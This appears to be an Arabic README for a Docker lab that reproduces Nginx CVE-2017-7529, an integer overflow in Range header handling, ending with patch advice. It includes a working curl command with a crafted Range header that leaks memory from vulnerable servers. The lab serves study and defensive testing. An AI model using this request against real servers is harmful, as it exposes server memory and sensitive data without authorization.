
بيئة إعادة إنتاج قائمة على Docker لثغرة تجاوز عدد صحيح Nginx CVE-2017-7529، توضح كشف المعلومات عبر رؤوس Range مصممة مع دليل استغلال خطوة بخطوة.
Nginx هو خادم ويب عالي الأداء ومفتوح المصدر يُستخدم على نطاق واسع كخادم ويب ووكيل عكسي وخادم تخزين مؤقت وغير ذلك.
في إصدارات Nginx 1.13.2 والإصدارات الأقدم، توجد ثغرة أمنية ناتجة عن تجاوز عدد صحيح (integer overflow) تسمح للمهاجم بالتلاعب برأس Range وكشف أجزاء من الذاكرة أو معلومات حساسة خارج نطاق الاستجابة الأصلي.
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
يمكن أن تؤدي هذه الثغرة إلى كشف المعلومات (Information Disclosure) بمجرد طلب HTTP بسيط.
إذا كانت البيانات تتضمن معلومات إعدادات حساسة أو أي بيانات قابلة للتسريب، فقد يؤدي ذلك إلى حادث أمني خطير.
التصحيح: يُنصح بالتحديث إلى Nginx 1.13.3 أو أحدث.
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- 본 문서